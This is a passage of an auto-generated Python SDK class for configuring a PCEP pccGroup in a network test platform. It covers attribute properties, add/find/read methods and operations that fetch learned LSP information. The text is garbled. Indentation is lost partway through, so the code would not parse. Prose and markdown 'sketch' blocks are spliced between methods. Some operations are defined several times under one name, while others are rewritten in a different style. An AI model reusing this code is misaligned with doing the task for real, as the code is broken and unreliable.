        from ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.learnedinfo.learnedinfoupdate import LearnedInfoUpdate
        return LearnedInfoUpdate(self)

    @property
    def PcReplyLspParameters(self):
        """An instance of the PcReplyLspParameters class.

        Returns:
            obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.pcreplylspparameters.PcReplyLspParameters)

        Raises:
            NotFoundError: The requested resource does not exist on the server
            ServerError: The server has encountered an uncategorized error condition
        """
        from ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.pcreplylspparameters import PcReplyLspParameters
        return PcReplyLspParameters(self)._select()

    @property
    def PcRequestMatchCriteria(self):
        """An instance of the PcRequestMatchCriteria class.

        Returns:
            obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.pcrequestmatchcriteria.PcRequestMatchCriteria)

        Raises:
            NotFoundError: The requested resource does not exist on the server
            ServerError: The server has encountered an uncategorized error condition
        """
        from ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.pcrequestmatchcriteria import PcRequestMatchCriteria
        return PcRequestMatchCriteria(self)._select()

    @property
    def PceInitiateLSPParameters(self):
        """An instance of the PceInitiateLSPParameters class.

        Returns:
            obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.pceinitiatelspparameters.PceInitiateLSPParameters)

        Raises:
            NotFoundError: The requested resource does not exist on the server
            ServerError: The server has encountered an uncategorized error condition
        """
        from ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.pceinitiatelspparameters import PceInitiateLSPParameters
        return PceInitiateLSPParameters(self)._select()

    @property
    def Active(self):
        """Activate/Deactivate Configuration

        Returns:
            obj(ixnetwork_restpy.multivalue.Multivalue)
        """
        return self._get_attribute('active')

    @property
    def Authentication(self):
        """The type of cryptographic authentication to be used on this link interface

        Returns:
            obj(ixnetwork_restpy.multivalue.Multivalue)
        """
        return self._get_attribute('authentication')
@property
def BurstInterval(self):
"""Interval in milisecond in which desired rate of messages needs to be maintained.
Returns:
obj(ixnetwork_restpy.multivalue.Multivalue)
"""
return self._get_attribute('burstInterval')
@property
def ConnectedVia(self):
"""List of layers this layer used to connect to the wire
Returns:
list(str[None|/api/v1/sessions/1/ixnetwork/topology?deepchild=*])
"""
return self._get_attribute('connectedVia')
@ConnectedVia.setter
def ConnectedVia(self, value):
self._set_attribute('connectedVia', value)
@property
def Count(self):
"""Number of elements inside associated multiplier-scaled container object, e.g. number of devices inside a Device Group
Returns:
number
"""
return self._get_attribute('count')
@property
def DeadInterval(self):
"""This is the time interval, after the expiration of which, a PCEP peer declares the session down if no PCEP message has been received.
Returns:
obj(ixnetwork_restpy.multivalue.Multivalue)
"""
return self._get_attribute('deadInterval')
@property
def DescriptiveName(self):
"""Longer, more descriptive name for element. It's not guaranteed to be unique like -name-, but maybe offers more context
Returns:
str
"""
return self._get_attribute('descriptiveName')
@property
def Errors(self):
"""A list of errors that have occurred
Returns:
list(dict(arg1:str[None|/api/v1/sessions/1/ixnetwork/?deepchild=*],arg2:list[str]))
"""
return self._get_attribute('errors')
@property
def KeepaliveInterval(self):
"""Frequency/Time Interval of sending PCEP messages to keep the session active.
Returns:
obj(ixnetwork_restpy.multivalue.Multivalue)
"""
return self._get_attribute('keepaliveInterval')
@property
def MD5Key(self):
"""A value to be used as the secret MD5 Key.
Returns:
obj(ixnetwork_restpy.multivalue.Multivalue)
"""
return self._get_attribute('mD5Key')
@property
def MaxInitiatedLspPerInterval(self):
"""Maximum number of messages can be sent per interval.
Returns:
obj(ixnetwork_restpy.multivalue.Multivalue)
"""
return self._get_attribute('maxInitiatedLspPerInterval')
@property
def MaxLspsPerPcInitiate(self):
"""Controls the maximum number of LSPs that can be present in a PCInitiate message.
Returns:
obj(ixnetwork_restpy.multivalue.Multivalue)
"""
return self._get_attribute('maxLspsPerPcInitiate')
@property
def Multiplier(self):
"""Number of layer instances per parent instance (multiplier)
Returns:
number
"""
return self._get_attribute('multiplier')
@Multiplier.setter
def Multiplier(self, value):
self._set_attribute('multiplier', value)
@property
def Name(self):
"""Name of NGPF element, guaranteed to be unique in Scenario
Returns:
str
"""
return self._get_attribute('name')
@Name.setter
def Name(self, value):
self._set_attribute('name', value)
@property
def PcReplyLspsPerPcc(self):
"""Controls the maximum number of PCE LSPs that can be send as PATH Response.
Returns:
number
"""
return self._get_attribute('pcReplyLspsPerPcc')
@PcReplyLspsPerPcc.setter
def PcReplyLspsPerPcc(self, value):
self._set_attribute('pcReplyLspsPerPcc', value)
@property
def PccIpv4Address(self):
"""IPv4 address of the PCC. This column is greyed out in case of PCEv6.
Returns:
obj(ixnetwork_restpy.multivalue.Multivalue)
"""
return self._get_attribute('pccIpv4Address')
@property
def PceInitiatedLspsPerPcc(self):
"""Controls the maximum number of PCE LSPs that can be Initiated per PCC.
Returns:
number
"""
return self._get_attribute('pceInitiatedLspsPerPcc')
@PceInitiatedLspsPerPcc.setter
def PceInitiatedLspsPerPcc(self, value):
self._set_attribute('pceInitiatedLspsPerPcc', value)
@property
def PcePpagTLVType(self):
"""PPAG TLV Type specifies PCE's capability of interpreting this type of PPAG TLV
Returns:
obj(ixnetwork_restpy.multivalue.Multivalue)
"""
return self._get_attribute('pcePpagTLVType')
@property
def RateControl(self):
"""The rate control is an optional feature associated with PCE initiated LSP.
Returns:
obj(ixnetwork_restpy.multivalue.Multivalue)
"""
return self._get_attribute('rateControl')
@property
def SessionStatus(self):
"""Current state of protocol session: Not Started - session negotiation not started, the session is not active yet. Down - actively trying to bring up a protocol session, but negotiation is didn't successfully complete (yet). Up - session came up successfully.
Returns:
list(str[down|notStarted|up])
"""
return self._get_attribute('sessionStatus')
@property
def SrPceCapability(self):
"""The SR PCE Capability TLV is an optional TLV associated with the OPEN Object to exchange SR capability of PCEP speakers.
Returns:
obj(ixnetwork_restpy.multivalue.Multivalue)
"""
return self._get_attribute('srPceCapability')
@property
def StackedLayers(self):
"""List of secondary (many to one) child layer protocols
Returns:
list(str[None|/api/v1/sessions/1/ixnetwork/topology?deepchild=*])
"""
return self._get_attribute('stackedLayers')
@StackedLayers.setter
def StackedLayers(self, value):
self._set_attribute('stackedLayers', value)
@property
def StateCounts(self):
"""A list of values that indicates the total number of sessions, the number of sessions not started, the number of sessions down and the number of sessions that are up
Returns:
dict(total:number,notStarted:number,down:number,up:number)
"""
return self._get_attribute('stateCounts')
@property
def Status(self):
"""Running status of associated network element. Once in Started state, protocol sessions will begin to negotiate.
Returns:
str(configured|error|mixed|notStarted|started|starting|stopping)
"""
return self._get_attribute('status')
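A sketch (not part of the generated SDK) of how the attributes above are typically consumed, given a hypothetical `pcc_group` instance: scalar attributes such as Count and Status return plain values, while Multivalue attributes such as Active or KeepaliveInterval return Multivalue objects whose per-device patterns are configured through the Multivalue API rather than by direct assignment.

```python
def summarize_pcc_group(pcc_group):
    """Collect a few read-only state fields from one pccGroup (sketch only)."""
    return {
        'name': pcc_group.Name,                 # plain str, settable
        'count': pcc_group.Count,               # plain number, read-only
        'state_counts': pcc_group.StateCounts,  # dict with total/notStarted/down/up
        'status': pcc_group.Status,             # single enum string
    }
```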
def add(self, ConnectedVia=None, Multiplier=None, Name=None, PcReplyLspsPerPcc=None, PceInitiatedLspsPerPcc=None, StackedLayers=None):
"""Adds a new pccGroup node on the server and retrieves it in this instance.
Args:
ConnectedVia (list(str[None|/api/v1/sessions/1/ixnetwork/topology?deepchild=*])): List of layers this layer uses to connect to the wire
Multiplier (number): Number of layer instances per parent instance (multiplier)
Name (str): Name of NGPF element, guaranteed to be unique in Scenario
PcReplyLspsPerPcc (number): Controls the maximum number of PCE LSPs that can be sent as a PATH Response.
PceInitiatedLspsPerPcc (number): Controls the maximum number of PCE LSPs that can be Initiated per PCC.
StackedLayers (list(str[None|/api/v1/sessions/1/ixnetwork/topology?deepchild=*])): List of secondary (many to one) child layer protocols
Returns:
self: This instance with all currently retrieved pccGroup data using find and the newly added pccGroup data available through an iterator or index
Raises:
ServerError: The server has encountered an uncategorized error condition
"""
return self._create(locals())
def remove(self):
"""Deletes all the pccGroup data in this instance from server.
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
self._delete()
def find(self, ConnectedVia=None, Count=None, DescriptiveName=None, Errors=None, Multiplier=None, Name=None, PcReplyLspsPerPcc=None, PceInitiatedLspsPerPcc=None, SessionStatus=None, StackedLayers=None, StateCounts=None, Status=None):
"""Finds and retrieves pccGroup data from the server.
All named parameters support regex and can be used to selectively retrieve pccGroup data from the server.
By default the find method takes no parameters and will retrieve all pccGroup data from the server.
Args:
ConnectedVia (list(str[None|/api/v1/sessions/1/ixnetwork/topology?deepchild=*])): List of layers this layer uses to connect to the wire
Count (number): Number of elements inside associated multiplier-scaled container object, e.g. number of devices inside a Device Group
DescriptiveName (str): Longer, more descriptive name for element. It's not guaranteed to be unique like -name-, but may offer more context
Errors (list(dict(arg1:str[None|/api/v1/sessions/1/ixnetwork/?deepchild=*],arg2:list[str]))): A list of errors that have occurred
Multiplier (number): Number of layer instances per parent instance (multiplier)
Name (str): Name of NGPF element, guaranteed to be unique in Scenario
PcReplyLspsPerPcc (number): Controls the maximum number of PCE LSPs that can be sent as a PATH Response.
PceInitiatedLspsPerPcc (number): Controls the maximum number of PCE LSPs that can be Initiated per PCC.
SessionStatus (list(str[down|notStarted|up])): Current state of protocol session: Not Started - session negotiation not started, the session is not active yet. Down - actively trying to bring up a protocol session, but negotiation hasn't successfully completed (yet). Up - session came up successfully.
StackedLayers (list(str[None|/api/v1/sessions/1/ixnetwork/topology?deepchild=*])): List of secondary (many to one) child layer protocols
StateCounts (dict(total:number,notStarted:number,down:number,up:number)): A set of counts indicating the total number of sessions and the number of sessions that are not started, down, and up
Status (str(configured|error|mixed|notStarted|started|starting|stopping)): Running status of associated network element. Once in Started state, protocol sessions will begin to negotiate.
Returns:
self: This instance with matching pccGroup data retrieved from the server available through an iterator or index
Raises:
ServerError: The server has encountered an uncategorized error condition
"""
return self._select(locals())
def read(self, href):
"""Retrieves a single instance of pccGroup data from the server.
Args:
href (str): An href to the instance to be retrieved
Returns:
self: This instance with the pccGroup data from the server available through an iterator or index
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
return self._read(href)
def ClearPceAllLearnedInfo(self, *args, **kwargs):
    """Executes the clearPceAllLearnedInfo operation on the server.
    Clears ALL Learned LSP Information By PCC Device.
    The IxNetwork model allows multiple signatures for this operation while Python does not
    (repeated def statements would shadow each other), so the modeled signatures map onto
    *args/**kwargs as follows:
    ClearPceAllLearnedInfo() - operates on every encapsulated instance (Arg1 is set internally)
    ClearPceAllLearnedInfo(SessionIndices=list(number)) - an array of session numbers, e.g. [0, 1, 2, 3]
    ClearPceAllLearnedInfo(SessionIndices=str) - a string of session numbers, e.g. '1-4;6;7-12'
    ClearPceAllLearnedInfo(Arg2=list(number)) -> list(str) - a list of indices into the protocol plugin (an empty list indicates all instances); returns IDs to associate each async action invocation
    Raises:
    NotFoundError: The requested resource does not exist on the server
    ServerError: The server has encountered an uncategorized error condition
    """
    payload = {'Arg1': self}
    for i in range(len(args)):
        payload['Arg%s' % (i + 2)] = args[i]
    for item in kwargs.items():
        payload[item[0]] = item[1]
    return self._execute('ClearPceAllLearnedInfo', payload=payload, response_object=None)
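A sketch (not part of the generated SDK) of driving a server operation such as ClearPceAllLearnedInfo from a hypothetical `pcc_group` instance: the optional SessionIndices parameter selects which sessions the operation targets, either as a list of zero-based indices or as a range string.

```python
def clear_learned_info(pcc_group, session_indices=None):
    """Clear learned LSP info on all or selected sessions (sketch only)."""
    if session_indices is None:
        # No argument: the operation applies to every encapsulated session
        pcc_group.ClearPceAllLearnedInfo()
    else:
        # session_indices may be a list (e.g. [0, 1, 2]) or a range
        # string (e.g. '1-4;6;7-12'), per the docstring above
        pcc_group.ClearPceAllLearnedInfo(SessionIndices=session_indices)
```

The other GetPceBasic* operations below follow the same calling convention.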
def GetPceBasicAllRsvpLspLearnedInfo(self, *args, **kwargs):
    """Executes the getPceBasicAllRsvpLspLearnedInfo operation on the server.
    Gets Basic Information about All RSVP LSPs learnt by this PCE.
    The IxNetwork model allows multiple signatures for this operation while Python does not
    (repeated def statements would shadow each other), so the modeled signatures map onto
    *args/**kwargs as follows:
    GetPceBasicAllRsvpLspLearnedInfo() - operates on every encapsulated instance (Arg1 is set internally)
    GetPceBasicAllRsvpLspLearnedInfo(SessionIndices=list(number)) - an array of session numbers, e.g. [0, 1, 2, 3]
    GetPceBasicAllRsvpLspLearnedInfo(SessionIndices=str) - a string of session numbers, e.g. '1-4;6;7-12'
    GetPceBasicAllRsvpLspLearnedInfo(Arg2=list(number)) -> list(str) - a list of indices into the protocol plugin (an empty list indicates all instances); returns IDs to associate each async action invocation
    Raises:
    NotFoundError: The requested resource does not exist on the server
    ServerError: The server has encountered an uncategorized error condition
    """
    payload = {'Arg1': self}
    for i in range(len(args)):
        payload['Arg%s' % (i + 2)] = args[i]
    for item in kwargs.items():
        payload[item[0]] = item[1]
    return self._execute('GetPceBasicAllRsvpLspLearnedInfo', payload=payload, response_object=None)
def GetPceBasicAllSrLspLearnedInfo(self, *args, **kwargs):
    """Executes the getPceBasicAllSrLspLearnedInfo operation on the server.
    Gets Basic Information about All SR LSPs learnt by this PCE.
    The IxNetwork model allows multiple signatures for this operation while Python does not
    (repeated def statements would shadow each other), so the modeled signatures map onto
    *args/**kwargs as follows:
    GetPceBasicAllSrLspLearnedInfo() - operates on every encapsulated instance (Arg1 is set internally)
    GetPceBasicAllSrLspLearnedInfo(SessionIndices=list(number)) - an array of session numbers, e.g. [0, 1, 2, 3]
    GetPceBasicAllSrLspLearnedInfo(SessionIndices=str) - a string of session numbers, e.g. '1-4;6;7-12'
    GetPceBasicAllSrLspLearnedInfo(Arg2=list(number)) -> list(str) - a list of indices into the protocol plugin (an empty list indicates all instances); returns IDs to associate each async action invocation
    Raises:
    NotFoundError: The requested resource does not exist on the server
    ServerError: The server has encountered an uncategorized error condition
    """
    payload = {'Arg1': self}
    for i in range(len(args)):
        payload['Arg%s' % (i + 2)] = args[i]
    for item in kwargs.items():
        payload[item[0]] = item[1]
    return self._execute('GetPceBasicAllSrLspLearnedInfo', payload=payload, response_object=None)
def GetPceBasicRsvpPccRequestedLspLearnedInfo(self, *args, **kwargs):
    """Executes the getPceBasicRsvpPccRequestedLspLearnedInfo operation on the server.
    Gets Basic Information about RSVP-TE PCC Requested LSPs learnt by this PCE.
    The IxNetwork model allows multiple signatures for this operation while Python does not
    (repeated def statements would shadow each other), so the modeled signatures map onto
    *args/**kwargs as follows:
    GetPceBasicRsvpPccRequestedLspLearnedInfo() - operates on every encapsulated instance (Arg1 is set internally)
    GetPceBasicRsvpPccRequestedLspLearnedInfo(SessionIndices=list(number)) - an array of session numbers, e.g. [0, 1, 2, 3]
    GetPceBasicRsvpPccRequestedLspLearnedInfo(SessionIndices=str) - a string of session numbers, e.g. '1-4;6;7-12'
    GetPceBasicRsvpPccRequestedLspLearnedInfo(Arg2=list(number)) -> list(str) - a list of indices into the protocol plugin (an empty list indicates all instances); returns IDs to associate each async action invocation
    Raises:
    NotFoundError: The requested resource does not exist on the server
    ServerError: The server has encountered an uncategorized error condition
    """
    payload = {'Arg1': self}
    for i in range(len(args)):
        payload['Arg%s' % (i + 2)] = args[i]
    for item in kwargs.items():
        payload[item[0]] = item[1]
    return self._execute('GetPceBasicRsvpPccRequestedLspLearnedInfo', payload=payload, response_object=None)
def GetPceBasicRsvpPccSyncLspLearnedInfo(self, *args, **kwargs):
    """Executes the getPceBasicRsvpPccSyncLspLearnedInfo operation on the server.
    Gets Basic Information about RSVP-TE PCC Sync/Report LSPs learnt by this PCE.
    The IxNetwork model allows multiple signatures for this operation while Python does not
    (repeated def statements would shadow each other), so the modeled signatures map onto
    *args/**kwargs as follows:
    GetPceBasicRsvpPccSyncLspLearnedInfo() - operates on every encapsulated instance (Arg1 is set internally)
    GetPceBasicRsvpPccSyncLspLearnedInfo(SessionIndices=list(number)) - an array of session numbers, e.g. [0, 1, 2, 3]
    GetPceBasicRsvpPccSyncLspLearnedInfo(SessionIndices=str) - a string of session numbers, e.g. '1-4;6;7-12'
    GetPceBasicRsvpPccSyncLspLearnedInfo(Arg2=list(number)) -> list(str) - a list of indices into the protocol plugin (an empty list indicates all instances); returns IDs to associate each async action invocation
    Raises:
    NotFoundError: The requested resource does not exist on the server
    ServerError: The server has encountered an uncategorized error condition
    """
    payload = {'Arg1': self}
    for i in range(len(args)):
        payload['Arg%s' % (i + 2)] = args[i]
    for item in kwargs.items():
        payload[item[0]] = item[1]
    return self._execute('GetPceBasicRsvpPccSyncLspLearnedInfo', payload=payload, response_object=None)
def GetPceBasicRsvpPceInitiatedLspLearnedInfo(self, *args, **kwargs):
    """Executes the getPceBasicRsvpPceInitiatedLspLearnedInfo operation on the server.
    Gets Basic Information about RSVP-TE PCE Initiated LSPs learnt by this PCE.
    The IxNetwork model allows multiple signatures for this operation while Python does not
    (repeated def statements would shadow each other), so the modeled signatures map onto
    *args/**kwargs as follows:
    GetPceBasicRsvpPceInitiatedLspLearnedInfo() - operates on every encapsulated instance (Arg1 is set internally)
    GetPceBasicRsvpPceInitiatedLspLearnedInfo(SessionIndices=list(number)) - an array of session numbers, e.g. [0, 1, 2, 3]
    GetPceBasicRsvpPceInitiatedLspLearnedInfo(SessionIndices=str) - a string of session numbers, e.g. '1-4;6;7-12'
    GetPceBasicRsvpPceInitiatedLspLearnedInfo(Arg2=list(number)) -> list(str) - a list of indices into the protocol plugin (an empty list indicates all instances); returns IDs to associate each async action invocation
    Raises:
    NotFoundError: The requested resource does not exist on the server
    ServerError: The server has encountered an uncategorized error condition
    """
    payload = {'Arg1': self}
    for i in range(len(args)):
        payload['Arg%s' % (i + 2)] = args[i]
    for item in kwargs.items():
        payload[item[0]] = item[1]
    return self._execute('GetPceBasicRsvpPceInitiatedLspLearnedInfo', payload=payload, response_object=None)
def GetPceBasicSrPccRequestedLspLearnedInfo(self, *args, **kwargs):
    """Executes the getPceBasicSrPccRequestedLspLearnedInfo operation on the server.
    Gets Basic Information about SR-TE PCC Requested LSPs learnt by this PCE.
    The IxNetwork model allows multiple signatures for this operation while Python does not
    (repeated def statements would shadow each other), so the modeled signatures map onto
    *args/**kwargs as follows:
    GetPceBasicSrPccRequestedLspLearnedInfo() - operates on every encapsulated instance (Arg1 is set internally)
    GetPceBasicSrPccRequestedLspLearnedInfo(SessionIndices=list(number)) - an array of session numbers, e.g. [0, 1, 2, 3]
    GetPceBasicSrPccRequestedLspLearnedInfo(SessionIndices=str) - a string of session numbers, e.g. '1-4;6;7-12'
    GetPceBasicSrPccRequestedLspLearnedInfo(Arg2=list(number)) -> list(str) - a list of indices into the protocol plugin (an empty list indicates all instances); returns IDs to associate each async action invocation
    Raises:
    NotFoundError: The requested resource does not exist on the server
    ServerError: The server has encountered an uncategorized error condition
    """
    payload = {'Arg1': self}
    for i in range(len(args)):
        payload['Arg%s' % (i + 2)] = args[i]
    for item in kwargs.items():
        payload[item[0]] = item[1]
    return self._execute('GetPceBasicSrPccRequestedLspLearnedInfo', payload=payload, response_object=None)
def GetPceBasicSrPccSyncLspLearnedInfo(self, *args, **kwargs):
    """Executes the getPceBasicSrPccSyncLspLearnedInfo operation on the server.
    Gets Basic Information about SR-TE PCC Sync/Report LSPs learnt by this PCE.
    The IxNetwork model allows multiple signatures for this operation while Python does not
    (repeated def statements would shadow each other), so the modeled signatures map onto
    *args/**kwargs as follows:
    GetPceBasicSrPccSyncLspLearnedInfo() - operates on every encapsulated instance (Arg1 is set internally)
    GetPceBasicSrPccSyncLspLearnedInfo(SessionIndices=list(number)) - an array of session numbers, e.g. [0, 1, 2, 3]
    GetPceBasicSrPccSyncLspLearnedInfo(SessionIndices=str) - a string of session numbers, e.g. '1-4;6;7-12'
    GetPceBasicSrPccSyncLspLearnedInfo(Arg2=list(number)) -> list(str) - a list of indices into the protocol plugin (an empty list indicates all instances); returns IDs to associate each async action invocation
    Raises:
    NotFoundError: The requested resource does not exist on the server
    ServerError: The server has encountered an uncategorized error condition
    """
    payload = {'Arg1': self}
    for i in range(len(args)):
        payload['Arg%s' % (i + 2)] = args[i]
    for item in kwargs.items():
        payload[item[0]] = item[1]
    return self._execute('GetPceBasicSrPccSyncLspLearnedInfo', payload=payload, response_object=None)
def GetPceBasicSrPceInitiatedLspLearnedInfo(self):
"""Executes the getPceBasicSrPceInitiatedLspLearnedInfo operation on the server.
Gets Basic Information about SR-TE PCE Initiated LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceBasicSrPceInitiatedLspLearnedInfo', payload=locals(), response_object=None)
def GetPceBasicSrPceInitiatedLspLearnedInfo(self, SessionIndices):
"""Executes the getPceBasicSrPceInitiatedLspLearnedInfo operation on the server.
Gets Basic Information about SR-TE PCE Initiated LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (list(number)): This parameter requires an array of session numbers 0 1 2 3
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceBasicSrPceInitiatedLspLearnedInfo', payload=locals(), response_object=None)
def GetPceBasicSrPceInitiatedLspLearnedInfo(self, SessionIndices):
"""Executes the getPceBasicSrPceInitiatedLspLearnedInfo operation on the server.
Gets Basic Information about SR-TE PCE Initiated LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceBasicSrPceInitiatedLspLearnedInfo', payload=locals(), response_object=None)
def GetPceBasicSrPceInitiatedLspLearnedInfo(self, Arg2):
"""Executes the getPceBasicSrPceInitiatedLspLearnedInfo operation on the server.
Gets Basic Information about SR-TE PCE Initiated LSPs learnt by this PCE.
Args:
Arg1 (str(None|/api/v1/sessions/1/ixnetwork/topology)): The method internally sets Arg1 to the current href for this instance
Arg2 (list(number)): List of indices into the protocol plugin. An empty list indicates all instances in the plugin.
Returns:
list(str): ID to associate each async action invocation
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self.href
return self._execute('GetPceBasicSrPceInitiatedLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedAllRsvpLspLearnedInfo(self):
"""Executes the getPceDetailedAllRsvpLspLearnedInfo operation on the server.
Gets Detailed Information about All RSVP LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceDetailedAllRsvpLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedAllRsvpLspLearnedInfo(self, SessionIndices):
"""Executes the getPceDetailedAllRsvpLspLearnedInfo operation on the server.
Gets Detailed Information about All RSVP LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (list(number)): This parameter requires an array of session numbers 0 1 2 3
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceDetailedAllRsvpLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedAllRsvpLspLearnedInfo(self, SessionIndices):
"""Executes the getPceDetailedAllRsvpLspLearnedInfo operation on the server.
Gets Detailed Information about All RSVP LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceDetailedAllRsvpLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedAllRsvpLspLearnedInfo(self, Arg2):
"""Executes the getPceDetailedAllRsvpLspLearnedInfo operation on the server.
Gets Detailed Information about All RSVP LSPs learnt by this PCE.
Args:
Arg1 (str(None|/api/v1/sessions/1/ixnetwork/topology)): The method internally sets Arg1 to the current href for this instance
Arg2 (list(number)): List of indices into the protocol plugin. An empty list indicates all instances in the plugin.
Returns:
list(str): ID to associate each async action invocation
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self.href
return self._execute('GetPceDetailedAllRsvpLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedAllSrLspLearnedInfo(self):
"""Executes the getPceDetailedAllSrLspLearnedInfo operation on the server.
Gets Detailed Information about All SR LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceDetailedAllSrLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedAllSrLspLearnedInfo(self, SessionIndices):
"""Executes the getPceDetailedAllSrLspLearnedInfo operation on the server.
Gets Detailed Information about All SR LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (list(number)): This parameter requires an array of session numbers 0 1 2 3
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceDetailedAllSrLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedAllSrLspLearnedInfo(self, SessionIndices):
"""Executes the getPceDetailedAllSrLspLearnedInfo operation on the server.
Gets Detailed Information about All SR LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceDetailedAllSrLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedAllSrLspLearnedInfo(self, Arg2):
"""Executes the getPceDetailedAllSrLspLearnedInfo operation on the server.
Gets Detailed Information about All SR LSPs learnt by this PCE.
Args:
Arg1 (str(None|/api/v1/sessions/1/ixnetwork/topology)): The method internally sets Arg1 to the current href for this instance
Arg2 (list(number)): List of indices into the protocol plugin. An empty list indicates all instances in the plugin.
Returns:
list(str): ID to associate each async action invocation
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self.href
return self._execute('GetPceDetailedAllSrLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedRsvpPccRequestedLspLearnedInfo(self):
"""Executes the getPceDetailedRsvpPccRequestedLspLearnedInfo operation on the server.
Gets Detailed Information about RSVP-TE PCC Requested LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceDetailedRsvpPccRequestedLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedRsvpPccRequestedLspLearnedInfo(self, SessionIndices):
"""Executes the getPceDetailedRsvpPccRequestedLspLearnedInfo operation on the server.
Gets Detailed Information about RSVP-TE PCC Requested LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (list(number)): This parameter requires an array of session numbers 0 1 2 3
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceDetailedRsvpPccRequestedLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedRsvpPccRequestedLspLearnedInfo(self, SessionIndices):
"""Executes the getPceDetailedRsvpPccRequestedLspLearnedInfo operation on the server.
Gets Detailed Information about RSVP-TE PCC Requested LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceDetailedRsvpPccRequestedLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedRsvpPccRequestedLspLearnedInfo(self, Arg2):
"""Executes the getPceDetailedRsvpPccRequestedLspLearnedInfo operation on the server.
Gets Detailed Information about RSVP-TE PCC Requested LSPs learnt by this PCE.
Args:
Arg1 (str(None|/api/v1/sessions/1/ixnetwork/topology)): The method internally sets Arg1 to the current href for this instance
Arg2 (list(number)): List of indices into the protocol plugin. An empty list indicates all instances in the plugin.
Returns:
list(str): ID to associate each async action invocation
Raises:
